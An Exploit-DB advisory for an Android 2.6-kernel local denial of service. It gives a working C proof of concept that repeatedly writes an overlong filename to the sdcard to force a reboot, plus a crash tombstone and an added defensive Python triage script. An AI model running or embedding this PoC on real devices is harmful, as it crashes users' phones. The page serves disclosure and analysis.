Google Android Kernel 2.6 – Local Denial of Service Crash (PoC)

  • Author: G13
    Date: 2012-12-09
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/23248/
  • # Exploit Title: Android Kernel 2.6 Local DoS
    # Date: 12/7/12
    # Author: G13
    # Twitter: @g13net
    # Versions: Android 2.2, 2.3
    # Category: DoS (android)
    #
    
    ##### Vulnerability #####
    
    The Android OS is vulnerable to a local DoS when repeated attempts are made
    to write a file whose name has a length of 2048 or larger to the sdcard
    (vfat fs).
    
    When the exploit code runs successfully, the system restarts.
    
    The vulnerability only affects Android kernels in the 2.6 version family.
    
    ##### Vendor Timeline #####
    
    The Android Security Team has been contacted with updated PoC code and
    details.
    
    They have been aware of this vulnerability for over a year.
    
    ##### Tombstone #####
    
    *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
    Build fingerprint: 'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
    pid: 349, tid: 363, name: SensorService  >>> system_server <<<
    signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
    r0 00000000  r1 00000008  r2 00000040  r3 00000000
    r4 2a114310  r5 00000000  r6 51504690  r7 00000025
    r8 2a114330  r9 2a114350  sl 00000003  fp 00000003
    ip fffd4084  sp 51501eb0  lr 40039b70  pc 40037cf0  cpsr 20030010
    d0  4271bc7bd0b80000  d1  0000000000000000
    d2  0000000000000000  d3  427181eae9200000
    d4  0000000000000000  d5  0000000000000000
    d6  0000000000000000  d7  0000000000000000
    d8  0000000000000000  d9  0000000000000000
    d10 0000000000000000  d11 0000000000000000
    d12 0000000000000000  d13 0000000000000000
    d14 0000000000000000  d15 0000000000000000
    d16 3fe99999a0000000  d17 3fe999999999999a
    d18 0033003200310030  d19 0000000000000000
    d20 3fc554e7eb0eb47c  d21 3e66376972bea4d0
    d22 3f4de16b9c24a98f  d23 3fb0f4a31edab38b
    d24 3fede16b9c24a98f  d25 3fe55559ee5e69f9
    d26 0000000000000000  d27 0000000000000000
    d28 0000000000000005  d29 0000000000000000
    d30 0000000000000000  d31 0000000000000000
    scr 20000010
    
    backtrace:
    #00  pc 0000dcf0  /system/lib/libc.so (kill+12)
    #01  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #02  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #03  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #04  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #05  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #06  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #07  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #08  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #09  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #10  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #11  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #12  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #13  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #14  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #15  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #16  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    
    ##### PoC #####
    
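    #include <stdio.h>
    #include <string.h>   /* strcpy, strcat */
    
    int main(int argc, char** argv) {
        char buf[5000];
        int j, k;
        FILE *fp;
    
        /* Path to sdcard, typically /sdcard/ */
        strcpy(buf, "/sdcard/");
        /* Build the overlong filename described above */
        for (k = 0; k <= 2048; k++) {
            strcat(buf, "A");
        }
        /* Attempt to open the file for writing multiple times */
        for (j = 0; j <= 50; j++) {
            fp = fopen(buf, "w");
        }
        return 0;
    }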
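
Added triage example, not part of the original advisory or the author's code: a Python sketch that summarises a tombstone like the one in the Tombstone section, decoding `code -6` as `SI_TKILL`, checking whether the "fault addr" is really the sender's PID, and collapsing the repeated backtrace frames. The sample text is abridged from the page's tombstone; the function name `triage` and the result field names are hypothetical.

```python
import re
from itertools import groupby

# Constructed sample: abridged from the tombstone on this page
# (register dump omitted, backtrace cut to four frames).
SAMPLE = """\
pid: 349, tid: 363, name: SensorService  >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
backtrace:
    #00  pc 0000dcf0  /system/lib/libc.so (kill+12)
    #01  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #02  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #03  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
"""

# Linux si_code values that mean "sent by software", not raised by a CPU fault.
SI_CODES = {0: "SI_USER", -1: "SI_QUEUE", -6: "SI_TKILL"}

# \s* between fields tolerates copies whose column spacing was lost.
HEADER = re.compile(r"pid:\s*(\d+),\s*tid:\s*(\d+),\s*name:\s*(.+?)\s*>>>\s*(.+?)\s*<<<")
SIGNAL = re.compile(r"signal\s+\d+\s+\((\w+)\),\s*code\s+(-?\d+).*?fault addr\s+([0-9a-f]+)")
FRAME = re.compile(r"#\d+\s*pc\s*[0-9a-f]{8}\s*(\S+)\s+\((.+?)\)")


def triage(text):
    """Summarise a tombstone (hypothetical helper; field names are this example's)."""
    head, sig = HEADER.search(text), SIGNAL.search(text)
    if not head or not sig:
        raise ValueError("no tombstone header found")
    pid, code, addr = int(head.group(1)), int(sig.group(2)), int(sig.group(3), 16)
    frames = [m.groups() for m in FRAME.finditer(text)]
    return {
        "process": head.group(4),
        "thread": head.group(3),
        "signal": sig.group(1),
        "si_code": SI_CODES.get(code, str(code)),
        # For software-sent signals si_pid occupies the same storage as si_addr,
        # so "fault addr" holds the sender's PID; a match means self-raised.
        "self_raised": code in SI_CODES and addr == pid,
        # Collapse runs of identical frames into (library, symbol, count).
        "frames": [(lib, sym, len(list(run))) for (lib, sym), run in groupby(frames)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

For the page's tombstone this reports a SIGFPE that system_server sent to itself, with `kill` reached from `__aeabi_idiv0`, the ARM EABI integer divide-by-zero handler.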